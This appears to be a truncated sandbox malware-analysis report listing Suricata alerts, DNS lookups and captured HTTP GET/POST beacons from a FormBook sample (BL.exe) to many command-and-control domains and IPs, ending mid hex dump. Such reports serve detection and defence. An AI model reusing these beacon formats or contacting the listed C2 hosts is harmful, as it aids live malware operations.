Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57330 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57335 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57360 -> 8.210.49.139:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57348 -> 65.21.196.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57340 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57344 -> 209.74.64.187:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57351 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57349 -> 65.21.196.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57371 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57350 -> 65.21.196.90:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57368 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57369 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57370 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57355 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57375 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57339 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57354 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57327 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57336 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57372 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57343 -> 209.74.64.187:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57363 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57359 -> 8.210.49.139:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57353 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57356 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57357 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57352 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57362 -> 8.210.49.139:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57374 -> 103.106.67.112:80
            Source: DNS query: www.sailforever.xyz
            Source: DNS query: www.launchdreamidea.xyz
            Source: DNS query: www.030002837.xyz
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox View | IP Address: 209.74.64.187
            Source: Joe Sandbox View | IP Address: 65.21.196.90
            Source: Joe Sandbox View | IP Address: 94.23.162.163
            Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox View | ASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ
            Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox View | ASN Name: CP-ASDE
            Source: unknown | TCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Mon, 21 Oct 2024 15:26:38 GMT | server: Apache | set-cookie: __tad=1729524398.8660091; expires=Thu, 19-Oct-2034 15:26:38 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 582 | content-type: text/html; charset=UTF-8 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Mon, 21 Oct 2024 15:26:41 GMT | server: Apache | set-cookie: __tad=1729524401.7366602; expires=Thu, 19-Oct-2034 15:26:41 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 582 | content-type: text/html; charset=UTF-8 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Mon, 21 Oct 2024 15:26:43 GMT | server: Apache | set-cookie: __tad=1729524403.5845140; expires=Thu, 19-Oct-2034 15:26:43 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 582 | content-type: text/html; charset=UTF-8 | connection: close
            Source: global traffic | HTTP traffic detected: GET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.itemsort.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.rudemyvague.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.sailforever.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /bd77/?DJ=uNx48jdPyvmhqtM0&qFHlI=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHC3UpiwTnXxeZhDJSRDe+gKqbpDrlYtFKzXKQkj7Y9H+PYGWNXRqA= HTTP/1.1 | Host: www.launchdreamidea.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /t10u/?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.mondayigboleague.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /0bvj/?DJ=uNx48jdPyvmhqtM0&qFHlI=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYh+a9+td3GPcpjeWl06kCA+p4W4MdKq1Fwo+I6zMR0Ax5A/L5wR0= HTTP/1.1 | Host: www.stocksm.fun | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /v2k8/?qFHlI=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM/qngBj8ZZb4M/OowV3zWfgcOAFUEQlNa1pKq422xJxUSmdUbTzU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.drevohome.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34= HTTP/1.1 | Host: www.givingaway123.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /qxse/?qFHlI=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85K9GP26O7G/CGnyNUhwPTmghA/Wmfri1zUJzRsgXk3AqKswS13LU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.jagdud.store | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /y045/?qFHlI=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopZ2qqizp83SA4VvMOfKjYwWha+waZ/9hnzA5UcC/NzqTplHtuhYQ=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.030002837.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /m7sk/?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.ethetf.digital | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /12c7/?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.booosted.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /0628/?qFHlI=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+FigCVrQtCrgnSlgUA2JT078+MxZtZD+kFHsD8UJb6CndygVk2Aw=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.djazdgc.tokyo | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /9vwi/?qFHlI=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32clZoBW+L2SPWINxOvyiUavjXvOCviB5/F051x4xiH/bw0UeFq30=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1 | Host: www.productanalytics.pro | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: www.itemsort.shop
            Source: global traffic | DNS traffic detected: DNS query: www.rudemyvague.info
            Source: global traffic | DNS traffic detected: DNS query: www.gws-treinamento2.shop
            Source: global traffic | DNS traffic detected: DNS query: www.sailforever.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.launchdreamidea.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.mondayigboleague.info
            Source: global traffic | DNS traffic detected: DNS query: www.stocksm.fun
            Source: global traffic | DNS traffic detected: DNS query: www.drevohome.shop
            Source: global traffic | DNS traffic detected: DNS query: www.givingaway123.net
            Source: global traffic | DNS traffic detected: DNS query: www.jagdud.store
            Source: global traffic | DNS traffic detected: DNS query: www.030002837.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.ethetf.digital
            Source: global traffic | DNS traffic detected: DNS query: www.booosted.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.djazdgc.tokyo
            Source: global traffic | DNS traffic detected: DNS query: www.productanalytics.pro
            Source: global traffic | DNS traffic detected: DNS query: www.kmjai8jf.icu
            Source: unknown | HTTP traffic detected: POST /t7t4/ HTTP/1.1 | Host: www.rudemyvague.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en | Origin: http://www.rudemyvague.info | Referer: http://www.rudemyvague.info/t7t4/ | Content-Length: 210 | Content-Type: application/x-www-form-urlencoded | Connection: close | Cache-Control: max-age=0 | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36 | Data Ascii: qFHlI=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFASckS+Epi0PPW5Y0ApVdA/LXY5o/InBGF0SCAc+QNBVrOQ
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 21 Oct 2024 15:26:51 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 21 Oct 2024 15:26:54 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 21 Oct 2024 15:26:57 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 21 Oct 2024 15:26:59 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Mon, 21 Oct 2024 15:27:05 GMT | vary: User-Agent | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:10 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
